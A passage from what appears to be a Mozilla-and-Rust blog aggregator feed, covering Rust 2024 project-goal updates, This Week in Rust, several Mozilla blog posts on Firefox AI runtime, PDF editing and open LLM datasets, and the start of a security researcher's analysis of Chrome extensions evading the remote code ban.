  • Async Functions in Traits (and Return Position Impl Trait in Trait) are currently not consided dyn compatible. We would eventually like to have first-class dyn support, but as an intermediate step we created a procedural macro crate dynosaur1 that can create wrappers that enable dynamic dispatch. We are planning a comprehensive blog post in 2025H1 that shows how to use this crate and lays out the overall plan for async functions in traits.
  • Work was done to prototype an implementation for async drop but we didn't account for reviewing bandwidth. nikomatsakis has done initial reads and is working with PR author to get this done in 2025H1. To be clear though the scope of this is an experiment with the goal of uncovering implementation hurdles. There remains significant language design work before this feature would be considered for stabilization (we don't even have an RFC, and there are lots of unknowns remaining).
  • We have had fruitful discussions about the trait for async iteration but do not have widespread consensus, that's on the docket for 2025H1.

We largely completed our goal to stabilize the language features used by the Rust for Linux project. In some cases a small amount of work remains. Over the last six months, we...

  • stabilized the offset_of! macro to get the offset of fields;
  • almost stabilized the CoercePointee trait -- but discovered that the current implementaton was revealing unstable details, which is currently being resolved;
  • asm_goto stabilization PR and reference updates are up, excluding the "output" feature.
  • completed the majority of the work for arbitrary self types, which is being used by RfL and just needs documentation before stabilisation

We also began work on compiler flag stabilization with RFC 3716, which outlines a scheme for stabilizing flags that modify the target ABI.

Big shout-outs to Ding Xiang Fei, Alice Ryhl, Adrian Taylor, and Gary Guo for doing the lion's share of the work here.

The final release of Rust 2024 is confirmed for February 20, 2025 as part of Rust 1.85. Rust 1.85 is currently in beta. Feedback from the nightly beta and crater runs has been actively addressed, with adjustments to migrations and documentation to enhance user experience.

Big shout-outs to TC and Eric Huss for their hard work driving this program forward.

Final goal updates

Over the last six months a number of internal refactorings have taken place that are necessary to support a min_generic_const_args prototype.

One refactoring is that we have changed how we represent const arguments in the compiler to allow for adding a separate representation for the kinds of const arguments that min_generic_const_args will add.

Another big refactoring is that we have changed the API surface for our representation of const arguments in the type system layer, there is no longer a way to evaluate a const argument without going through our general purpose type system logic. This was necessary to ensure that we correctly handle equality of the kinds of const arguments that min_generic_const_args will support.

With all of these pre-requisite refactorings completed, a feature gate has been added to the compiler (feature(min_generic_const_args)) that uses the new internal representation of const arguments. We are now beginning to implement the actual language changes under this feature gate.

Shout-out to camelid, boxy and compiler-errors.

Over the course of the last six months...

  • cargo semver-checks began to include generic parameters and bounds in its schema, allowing for more precise lints;
  • cargo manifest linting was implemented and merged, allowing for lints that look at the cargo manifest;
  • building on cargo manifest linting, the feature_missing lint was added, which identifies breakage caused by the removal of a package feature.

In addition, we fleshed out a design sketch for the changes in rustdoc's JSON support that are needed to support cross-crate item linting. This in turn requires compiler extensions to supply that information to rustdoc.

  • Progress was made on adding const traits and implementation in the compiler, with improvements being carefully considered. Add was constified in rust#133237 and Deref/DerefMut in rust#133260.
  • Further progress was made on implementing stability for the const traits feature in rust#132823 and rust#133999, with additional PRs constifying more traits open at rust#133995 and rust#134628.
  • Over the last six months, we created a lang-team experiment devoted to this issue and spastorino began work on an experimental implementation. joshtriplett authored RFC 3680, which has received substantial feedback. The current work is focused on identifying "cheaply cloneable" types and making it easy to create closures that clone them instead of moving them.
  • Alternatives to sandboxed build scripts are going to be investigated instead of continuing this project goal into 2025h1 - namely, declaratively configuring system dependencies with system-deps, using an approach similar to code-checker Cackle and its sandbox environment Bubblewrap, or fully-sandboxed build environments like Docker or Nix.
  • Significant speedups have been achieved, reducing the slowest crate resolution time from over 120 seconds to 11 seconds, and decreasing the time to check all crates from 178 minutes to 71.42 minutes.
  • Performance improvements have been made to both the existing resolver and the new implementation, with the lock file verification time for all crates reduced from 44.90 minutes to 32.77 minutes (excluding some of the hardest cases).
  • Our pull request adding example searches and adding a search button has been added to the agenda for the rustdoc team next meeting.
  • The -Znext-solver=coherence stabilization is now stable in version 1.84, with a new update blogpost published.
  • Significant progress was made on bootstrap with -Znext-solver=globally. We're now able to compile rustc and cargo, enabling try-builds and perf runs.
  • An optimisation for the #[clippy::msrv] lint is open, benchmarked, and currently under review.
  • Help is needed on any issue marked with performance-project, especially on issue #13714.
  • Over the course of this goal, Nadrieril wrote and posted the never patterns RFC as an attempt to make progress without figuring out the whole picture, and the general feedback was "we want to see the whole picture". Next step will be to write up an RFC that includes a clear proposal for which empty patterns can and cannot be omitted. This is 100% bottlenecked on my own writing bandwidth (reach out if you want to help!). Work will continue but the goal won't be resubmitted for 2025h1.
  • Amanda has made progress on removing placeholders, focusing on lazy constraints and early error reporting, as well as investigating issues with rewriting type tests; a few tests are still failing, and it seems error reporting and diagnostics will be hard to keep exactly as today.
  • @lqd has opened PRs to land the prototype of the location-sensitive analysis. It's working well enough that it's worthwhile to land; there is still a lot of work left to do, but it's a major milestone, which we hoped to achieve with this project goal.
  • A fix stopping cargo-script from overriding the release profile was posted and merged.
  • Help is wanted for writing frontmatter support in rustc, as rustfmt folks are requesting it to be represented in the AST.
  • RFC is done, waiting for all rustdoc team members to take a look before implementation can start.
  • SparrowLii proposed a 2025H1 project goal to continue stabilizing the parallel front end, focusing on solving reproducible deadlock issues and improving parallel compilation performance.
  • The team discussed solutions to avoid potential deadlocks, finding that disabling work-stealing in rayon's subloops is effective, and will incorporate related modifications in a PR.
  • Progress on annotate-snippets continued despite a busy schedule, with a focus on improving suggestions and addressing architectural challenges.
  • A new API was designed in collaboration with epage, aiming to align annotate-snippets more closely with rustc for easier contribution and integration.
  • The project goal slate for 2025h1 has been posted as an RFC and is waiting on approval from project team leads.
  • Another pull request was merged with only one remaining until a working MVP is available on nightly.
  • Some features were removed to simplify upstreaming and will be added back as single PRs.
  • Will start work on batching feature of LLVM/Enzyme which allows Array of Struct and Struct of Array vectorisation.
  • There's been a push to add a AMD GPU target to the compiler which would have been needed for the LLVM offload project.
  • We have written and verified around 220 safety contracts in the verify-rust-std fork.
  • 3 out of 14 challenges have been solved.
  • We have successfully integrated Kani in the repository CI, and we are working on the integration of 2 other verification tools: VeriFast and Goto-transcoder (ESBMC)
  • There wasn't any progress on this goal, but building a community around a-mir-formality is still a goal and future plans are coming.

Goals without updates

The following goals have not received updates in the last month:

  1. As everyone knows, the hardest part of computer-science is naming. I think we rocked this one.

The Mozilla BlogRunning inference in web extensions

Image generated by DALL*E using the following prompt: A person standing on a platform in the ocean, surrounded by big waves. They are holding a sail with a big Firefox logo on it. Make it like Hokusai’s The Great Wave off Kanagawa print and make sure the boat looks like it can actually stay afloat

Image generated by DALL*E

We’re shipping a new API in Firefox Nightly that will let you use our Firefox AI runtime to run offline machine learning tasks in your web extension.

Firefox AI Runtime

We’ve recently shipped a new component inside of Firefox that leverages Transformers.js (a JavaScript equivalent of Hugging Face’s Transformers Python library) and the underlying ONNX runtime engine. This component lets you run any machine learning model that is compatible with Transformers.js in the browser, with no server-side calls beyond the initial download of the models. This means Firefox can run everything on your device and avoid sending your data to third parties.

Web applications can already use Transformers.js in vanilla JavaScript, but running through our platform offers some key benefits:

  • The inference runtime is executed in a dedicated, isolated process, for safety and robustness
  • Model files are stored using IndexedDB and shared across origins
  • Firefox-specific performance improvements are done to accelerate the runtime

This platform shipped in Firefox 133 to provide alt text for images in PDF.js, and will be used in several other places in Firefox 134 and beyond to improve the user experience.

We also want to unblock the community’s ability to experiment with these capabilities. Starting later today, developers will be able to access a new trial “ml” API in Firefox Nightly. This API is basically a thin wrapper around Firefox’s internal API, but with a few additional restrictions for user privacy and security.

There are two major differences between this API and most other WebExtensions APIs: the API is highly experimental and permission to use it must be requested after installation.

This new API is virtually guaranteed to change in the future. To help set developer expectations, the “ml” API is exposed under the “browser.trial” namespace rather than directly on the “browser” global object. Any API exposed on “browser.trial” may not be compatible across major versions of Firefox. Developers should guard against breaking changes using a combination of feature detection and strict_min_version declarations. You can see a more detailed description of how to write extensions with it in our documentation.

Running an inference task

Performing inference directly in the browser is quite exciting. We expect people will be able to build compelling features using the browser’s data locally.

Like the original Transformers that inspired it, Transformers.js uses “tasks” to abstract away implementation details for performing specific kinds of ML workloads. You can find a description of all tasks that Transformers.js supports in the project’s official documentation.

For our first iteration, Firefox exposes  the following tasks:

  • text-classification – Assigning a label or class to a given text
  • token-classification – Assigning a label to each token in a text
  • question-answering – Retrieve the answer to a question from a given text
  • fill-mask –  Masking some of the words in a sentence and predicting which words should replace those masks
  • summarization – Producing a shorter version of a document while preserving its important information.
  • translation – Converting text from one language to another
  • text2text-generation – converting one text sequence into another text sequence
  • text-generation – Producing new text by predicting the next word in a sequence
  • zero-shot-classification – Classifying text into classes that are unseen during training
  • image-to-text – Output text from a given image
  • image-classification – Assigning a label or class to an entire image
  • image-segmentation – Divides an image into segments where each pixel is mapped to an object 
  • zero-shot-image-classification – Classifying images into classes that are unseen during training
  • object-detection – Identify objects of certain defined classes within an image
  • zero-shot-object-detection – Identify objects of classes that are unseen during training
  • document-question-answering – Answering questions on document image
  • image-to-image – Transforming a source image to match the characteristics of a target image or a target image domain
  • depth-estimation – Predicting the depth of objects present in an image
  • feature-extraction – Transforming raw data into numerical features that can be processed while preserving the information in the original dataset
  • image-feature-extraction – Transforming raw data into numerical features that can be processed while preserving the information in the original image

For each task, we’ve selected a default model. See the list here EngineProcess.sys.mjs – mozsearch. These curated models are all stored in our Model Hub at https://model-hub.mozilla.org/. A Model Hub is how Hugging Face defines an online storage of models, see The Model Hub. Whether used by Firefox itself or an extension, models are automatically downloaded on the first use and cached.

Below is example below showing how to run a summarizer in your extension with the default model:

async function summarize(text) {
  await browser.trial.ml.createEngine({taskName: "summarization"});
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

If you want to use another model, you can use any model published on Hugging Face by Xenova or the Mozilla organization. For now, we’ve restricted downloading models from those two organizations, but we might relax this limitation in the future.

To use an allow-listed model from Hugging Face, you can use an options object to set the “modelHub” option to “huggingface”  and the “taskName” option to the appropriate task when creating an engine.

Let’s modify the previous example to use a model that can summarize larger texts:

async function summarize(text) {
  await browser.trial.ml.createEngine({
    taskName: "summarization", 
    modelHub: "huggingface", 
    modelId: "Xenova/long-t5-tglobal-base-16384-book-summary"
   });
  const result = await browser.trial.ml.runEngine({args: [text]});
  return result[0]["summary_text"];
}

Our PDF.js alt text feature follows the same pattern:

  • Gets the image to describe
  • Use the “image-to-text” task with the “mozilla/distilvit” model
  • Run the inference and return the generated text

This feature is built directly into Firefox, but we’ve also made a web extension example out of it, that you can find in our source code and use as a basis to build your own. See https://searchfox.org/mozilla-central/source/toolkit/components/ml/docs/extensions-api-example. For instance, it includes some code to request the relevant permission, and a model download progress bar.

We’d love to hear from you

This API is our first attempt to enable the community to build on the top of our Firefox AI Runtime. We want to make this API as simple and powerful as possible.

We believe that offering this feature to web extensions developers will help us learn and understand if and how such an API could be developed as a web standard in the future.

We’d love to hear from you and see what you are building with this.

Come and say hi in our dedicated Mozilla AI discord #firefox-ai. Discord invitation: https://discord.gg/Jmmq9mGwy7

Last but not least, we’re doing a deep dive talk at the FOSDEM in the Mozilla room Sunday February 2nd in Brussels. There will be many interesting talks in that room, see: https://fosdem.org/2025/schedule/track/mozilla/

The post Running inference in web extensions appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 583

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is resvg, an SVG rendering library.

Thanks to David Mason for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

397 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week for performance, with small improvements essentially on all benchmarks.

Triage done by @simulacrum. Revision range: 1ab85fbd..9a1d156f

0 Regression, 1 Improvement, 2 Mixed; 0 of them in rollups 40 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-01-22 - 2025-02-19 🦀

Virtual
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Memory safety issues mean you can’t trust what you’re seeing in your source code anymore.

Someone from Antithesis on the shuttle blog

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language BlogRust 2024 in beta channel

The Mozilla BlogSupercharge your day: Firefox features for peak productivity

Illustration of a browser interface with five large icons: a pin, magnifying glass, sparkles, an "X," and a menu, set against a gradient orange and yellow background with playful shapes like lightning bolts and stars.

Hi, I’m Tapan. As the leader of Firefox’s Search and AI efforts, my mission is to help users find what they are looking for on the web and stay focused on what truly matters. Outside of work, I indulge my geek side by building giant Star Wars Lego sets and sharing weekly leadership insights through my blog, Building Blocks. These hobbies keep me grounded and inspired as I tackle the ever-evolving challenges of the digital world.

I’ve always been fascinated by the internet — its infinite possibilities, endless rabbit holes and the wealth of knowledge just a click away. But staying focused online can feel impossible. I spend my days solving user problems, crafting strategies, and building products that empower people to navigate the web more effectively. Yet, even I am not immune to the pull of distraction. Let me paint you a picture of my daily online life. It’s a scene many of you might recognize: dozens of tabs open, notifications popping up from every corner, and a long to-do list staring at me. In this chaos, I’ve learned that staying focused requires intention and the right tools.

Over the years, I have discovered several Firefox features that are absolute game-changers for staying productive online:

1. Pinned Tabs: Anchor your essentials

Pinned Tabs get me to my most essential tabs in one click. I have a few persistent pinned tabs — my email, calendar, and files — and a few “daily” pinned tabs — my “must-dos” of the day tabs. This is my secret weapon for keeping my workspace organized. Pinned Tabs stay put and don’t clutter my tab bar, making it easy to switch between key resources without hunting my tab list.

To pin a tab, right-click it and select “Pin Tab.” Now, your essential tabs will always be at your fingertips.

2. Search: Use the fast lane

The “@” shortcut is my productivity superpower, taking me to search results in a flash. By typing “@amazon,” “@bing,” or “@history” followed by your search terms, you can instantly search those platforms or your browsing history without leaving your current page. This saves me time by letting me jump right to search results.

In the next Firefox update, we are making the search term persistent in the address bar so that you can use the address bar to refine your searches for supported sites.

To search supported sites, type “@” in the address bar and pick any engine from the supported list.

3. AI-powered summarization: Cut to the chase

This is one of my favorite recent additions to Firefox. Our AI summarization feature can distill long articles or documents into concise summaries, helping you grasp the key points without wading through endless text. Recently, I used Firefox’s AI summarization to condense sections of research papers on AI. This helped me quickly grasp the key findings and apply them to our strategy discussions for enhancing Firefox’s AI features. Using AI to help build AI!

To use AI-powered summarization, type “about:preferences#experimental” in the address bar and enable “AI chatbot.” Pick your favorite chatbot and sign in. Select any text on a page you wish to summarize and right-click to pick “Ask <your chatbot>.” We are adding new capabilities to this list with every release.

4. Close Duplicate Tabs: Declutter your workspace

If you are like me, you’ve probably opened the same webpage multiple times without realizing it. Firefox’s “Close Duplicate Tabs” feature eliminates this problem.

By clicking the tab list icon  at the top-right corner of the Firefox window, you can detect and close duplicate tabs, keeping your workspace clean and reducing mental load. This small but mighty tool is for anyone prone to tab overload.

5. Reader View: Eliminate distractions

Reader View transforms cluttered web pages into clean, distraction-free layouts. You can focus entirely on the content by stripping away ads, pop-ups, and other distractions. Whether reading an article or researching, this feature keeps your mind on the task.

To enable it, click the Reader View icon in the address bar when viewing a page.

These Firefox features have transformed how I navigate the web, helping me stay focused, productive, and in control of my time online. Whether managing a complex task, diving into research, or just trying to stay on top of your daily tasks, these tools can help you take charge of your browsing experience.

What are your favorite Firefox productivity tips? I would love to hear how you customize Firefox to fit your life.

Let’s make the web work for us!

Get Firefox

Get the browser that protects what’s important

The post Supercharge your day: Firefox features for peak productivity appeared first on The Mozilla Blog.

The Mozilla BlogMozilla, EleutherAI publish research on open datasets for LLM training

A group photo of 27 people standing together in a room with a colorful cityscape mural on the wall behind them.<figcaption class="wp-element-caption">Participants of the Dataset Convening in Amsterdam.</figcaption>

Update: Following the 2024 Mozilla AI Dataset Convening, AI builders and researchers publish best practices for creating open datasets for LLM training. 


Training datasets behind large language models (LLMs) often lack transparency, a research paper published by Mozilla and EleutherAI explores how openly licensed datasets that are responsibly curated and governed can make the AI ecosystem more equitable. The study is co-authored with thirty leading scholars and practitioners from prominent open source AI startups, nonprofit AI labs, and civil society organizations who attended the Dataset Convening on open AI datasets in June 2024.

Many AI companies rely on data crawled from the web, frequently without the explicit permission of copyright holders. While some jurisdictions like the EU and Japan permit this under specific conditions, the legal landscape in the United States remains murky. This lack of clarity has led to lawsuits and a trend toward secrecy in dataset practices—stifling transparency, accountability, and limiting innovation to those who can afford it.

For AI to truly benefit society, it must be built on foundations of transparency, fairness, and accountability—starting with the most foundational building block that powers it: data. 

The research, “Towards Best Practices for Open Datasets for LLM Training,” outlines possible tiers of openness, normative principles, and technical best practices for sourcing, processing, governing, and releasing open datasets for LLM training, as well as opportunities for policy and technical investments to help the emerging community overcome its challenges. 

READ THE RESEARCH HERE

Building toward a responsible AI future requires collaboration across legal, technical, and policy domains, along with investments in metadata standards, digitization, and fostering a culture of openness. 

To help advance the field, the paper compiles best practices for LLM builders, including guidance on Encoding preferences in metadata, Data sourcing, Data Processing, Data Governance/Release, and Terms of Use.

To explore the recommendations check the full paper (also available on arXiv). 

We are grateful to our collaborators – 273 Ventures, Ada Lovelace Institute, Alan Turing Institute, Cohere For AI, Common Voice, Creative Commons, Data Nutrition Project, Data Provenance Initiative, First Languages AI Reality (Mila), Gretel, HuggingFace, LLM360, Library Innovation Lab (Harvard), Open Future, Pleias, Spawning, The Distributed AI Research Institute, Together AI, and Ushahidi– for their leadership in this work, as well as Computer Says Maybe for their facilitation support. 

We look forward to the conversations it will spark.


Previous post published on July 2, 2024:

Mozilla and EleutherAI brought together experts to discuss a critical question: How do we create openly licensed and open-access LLM training datasets and how do we tackle the challenges faced by their builders?

On June 11, on the eve of MozFest House in AmsterdamMozilla and EleutherAI convened an exclusive group of 30 leading scholars and practitioners from prominent open-source AI startups, nonprofit AI labs and civil society organizations to discuss emerging practices for a new focus within the open LLM community: creating open-access and openly licensed LLM training datasets. 

This work is timely. Although sharing training datasets was once common practice among many AI actors, increased competitive pressures and legal risks have made it almost unheard of nowadays for pre-training datasets to be shared or even described by their developers. However, just as open-source software has made the internet safer and more robust, we at Mozilla and EleutherAI believe open-access data is a public good that can empower developers worldwide to build upon each other’s work. It fosters competition, innovation and transparency, providing clarity around legal standing and an ability to stand up to scrutiny.

Leading AI companies want us to believe that training performant LLMs without copyrighted material is impossible. We refuse to believe this. An emerging ecosystem of open LLM developers have created LLM training datasets —such as Common CorpusYouTube-CommonsFine WebDolmaAyaRed Pajama and many more—that could provide blueprints for more transparent and responsible AI progress. We were excited to invite many of them to join us in Amsterdam for a series of discussions about the challenges and opportunities of building an alternative to the current status quo that is open, legally compliant and just. 
During the event, we drew on the learnings from assembling “Common Pile” (the soon-to-be-released dataset by EleutherAI composed only of openly licensed and public domain data) which incorporates many learnings from its hugely successful predecessor, “The Pile.” At the event, EleutherAI released a technical briefing and an invitation to public consultation on Common Pile.

A speaker holding a microphone gestures while speaking, with a screen displaying "The Dataset Convening" in the background.<figcaption class="wp-element-caption">Participants engaged in a discussion at “The Dataset Convening,” hosted by Mozilla and EleutherAI on June 11, 2024 to explore creating open-access and openly licensed LLM training datasets.</figcaption>

Our goal with the convening was to bring in the experiences of open dataset builders to develop normative and technical recommendations and best practices around openly licensed and open-access datasets. Below are some highlights of our discussion:

  • Openness alone does not guarantee legal compliance or ethical outcomes, we asked which decision points can contribute to datasets being more just and sustainable in terms of public good and data rights. 
  • We discussed what “good” looks like, what we want to avoid, what is realistic and what is already being implemented in the realm of sourcing, curating, governing and releasing open training datasets. 
  • Issues such as the cumbersome nature of sourcing public domain and openly licensed data (e.g. extracting text from PDFs), manual verification of metadata, legal status of data across jurisdictions, retractability of consent, preference signaling, reproducibility and data curation and filtering were recurring themes in almost every discussion.
  • To enable more builders to develop open datasets and unblock the ecosystem, we need financial sustainability and smart infrastructural investments that can unblock the ecosystem.
  • The challenges faced by open datasets today bear a resemblance to those encountered in the early days of open source software (data quality, standardization and sustainability). Back then, it was the common artifacts that united the community and provided some shared understanding and language. We saw the Dataset Convening as an opportunity to start exactly there and create shared reference points that, even if not perfect, will guide us in a common direction.
  • The final insight round underscored that we have much to learn from each other: we are still in the early days of solving this immense challenge, and this nascent community needs to collaborate and think in radical and bold ways.
A group of four people sitting around a table with laptops and documents, engaged in a discussion. One person types on a laptop, while others look at papers and a phone. A colorful graffiti mural is on the wall behind them.<figcaption class="wp-element-caption">Participants at the Mozilla and EleutherAI event collaborating on best practices for creating open-access and openly licensed LLM training datasets.</figcaption>

We are immensely grateful to the participants in the Dataset Convening (including some remote contributors):

  • Stefan Baack — Researcher and Data Analyst, Insights, Mozilla
  • Mitchell Baker — Chairwoman, Mozilla Foundation
  • Ayah Bdeir — Senior Advisor, Mozilla
  • Julie Belião — Senior Director of Product Innovation, Mozilla.ai
  • Jillian Bommarito — Chief Risk Officer, 273 Ventures
  • Kasia Chmielinski — Project Lead, Data Nutrition Project
  • Jennifer Ding — Senior Researcher, Alan Turing Institute
  • Alix Dunn — CEO, Computer Says Maybe
  • Marzieh Fadaee — Senior Research Scientist, Cohere For AI
  • Maximilian Gahntz — AI Policy Lead, Mozilla
  • Paul Keller — Director of Policy and Co-Founder, Open Future
  • Hynek Kydlíček — Machine Learning Engineer, HuggingFace
  • Pierre-Carl Langlais — Co-Founder, Pleias
  • Greg Leppert — Director of Product and Research, the Library Innovation Lab, Harvard
  • EM Lewis-Jong — Director, Common Voice, Mozilla
  • Shayne Longpre — Project Lead, Data Provenance Initiative
  • Angela Lungati — Executive Director, Ushahidi
  • Sebastian Majstorovic — Open Data Specialist, EleutherAI
  • Cullen Miller — Vice President of Policy, Spawning
  • Victor Miller — Senior Product Manager, LLM360
  • Kasia Odrozek — Director, Insights, Mozilla
  • Guilherme Penedo — Machine Learning Research Engineer, HuggingFace
  • Neha Ravella — Research Project Manager, Insights Mozilla
  • Michael Running Wolf — Co-Founder and Lead Architect, First Languages AI Reality, Mila
  • Max Ryabinin — Distinguished Research Scientist, Together AI 
  • Kat Siminyu — Researcher, The Distributed AI Research Institute
  • Aviya Skowron — Head of Policy and Ethics, EleutherAI
  • Andrew Strait — Associate Director, Ada Lovelace Institute
  • Mark Surman — President, Mozilla Foundation
  • Anna Tumadóttir — CEO, Creative Commons
  • Marteen Van Segbroeck — Head of Applied Science, Gretel
  • Leandro von Werra — Chief Loss Officer, HuggingFace
  • Maurice Weber — AI Researcher, Together AI
  • Lee White — Senior Full Stack Developer, Ushahidi
  • Thomas Wolf — Chief Science Officer and Co-Founder, HuggingFace

In the coming weeks, we will be working with the participants to develop common artifacts that will be released to the community, along with an accompanying paper. These resources will help researchers and practitioners navigate the definitional and executional complexities of advancing open-access and openly licensed datasets and strengthen the sense of community. 

The event was part of the Mozilla Convening Series, where we bring together leading innovators in open source AI to tackle thorny issues and help move the community and movement forward. Our first convening was the Columbia Convening where we invited 40 leading scholars and practitioners to develop a framework for defining what openness means in AI. We are committed to continuing the efforts to support communities invested in openness around AI and look forward to helping grow and strengthen this movement. 

The post Mozilla, EleutherAI publish research on open datasets for LLM training appeared first on The Mozilla Blog.

The Mozilla BlogStreamline your schoolwork with Firefox’s PDF editor

As a student pursuing a master’s degree, I’ve spent too much time searching for PDF editors to fill out forms, take notes and complete projects. I discovered Firefox’s built-in PDF editor while interning at Mozilla as a corporate communications intern. No more giving out my email address or downloading dubious software, which often risks data. The built-in PDF tool on Firefox is a secure, efficient solution that saves me time. Here’s how it has made my academic life easier. 

Fill out applications and forms effortlessly

Remember those days when you had to print a form, fill it out and then scan it back into your computer? I know, tedious. With Firefox’s PDF editor, you can fill in forms online directly from your browser. Just open the PDF in Firefox on your smartphone or computer, click the “text” button, and you’re all set to type away. It’s a gamechanger for all those scholarship applications and administrative forms, or even adult-life documents we consistently have to fill. 

Using the text tool in a PDF editor to add and edit text with options for color and size.

Highlight and annotate lecture slides for efficient note-taking

I used to print my professors’ lecture slides and study materials just to add notes. Now, I keep my annotations within the browser – highlighting key points and adding notes. You can even choose your text size and color. This capability not only enhances my note-taking, it saves some trees too. No more losing 50-page printed slides around campus. 

Highlighting text and adding notes in a PDF using the highlight tool.

Sign documents electronically without hassle

Signing a PDF document was the single biggest dread I had as a millennial, a simple task made difficult. I used to have to search “free PDF editor” online, giving my personal information to make an account in order to use free software. Firefox makes it simple. Here’s how: Click the draw icon, select your preferred color and thickness, and draw directly on the document. Signing documents electronically finally feels like a 21st century achievement. 

Using the underline tool in a PDF editor to underline and correct text with options for color, thickness, and opacity.

Easily insert and customize images in your PDFs

Sometimes, adding an image to your PDF is necessary, whether it’s a graph for a report or a picture for a project. Firefox lets you upload and adjust images right within the PDF. You can even add alternative text or alt-text to make your documents more accessible, ensuring everyone in your group can understand your work.

A PDF editor displaying a red fox photo with an alt-text box open, suggesting "A red fox looking into the distance."

There are endless ways to make Firefox your own, however you choose to navigate the internet. We want to know how you customize Firefox. Let us know and tag us on X or Instagram at @Firefox.

Get Firefox

Get the browser that protects what’s important

The post Streamline your schoolwork with Firefox’s PDF editor appeared first on The Mozilla Blog.

Wladimir PalantMalicious extensions circumvent Google’s remote code ban

As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn’t in form of a policy but rather a technical change introduced with Manifest V3.

As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.

Screenshot of a Google webpage titled “Deal with remote hosted code violations.” The page text visible in the screenshot says: Remotely hosted code, or RHC, is what the Chrome Web Store calls anything that is executed by the browser that is loaded from someplace other than the extension's own files. Things like JavaScript and WASM. It does not include data or things like JSON or CSS.

Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.

Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.

Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.

Summary of the findings

This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.

It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.

The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.

Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.

In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.

Phoenix Invicta

Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.

For example, in its manifest this extension requests access to all websites:

"host_permissions": [
  "http://*/*",
  "https://*/*"
],

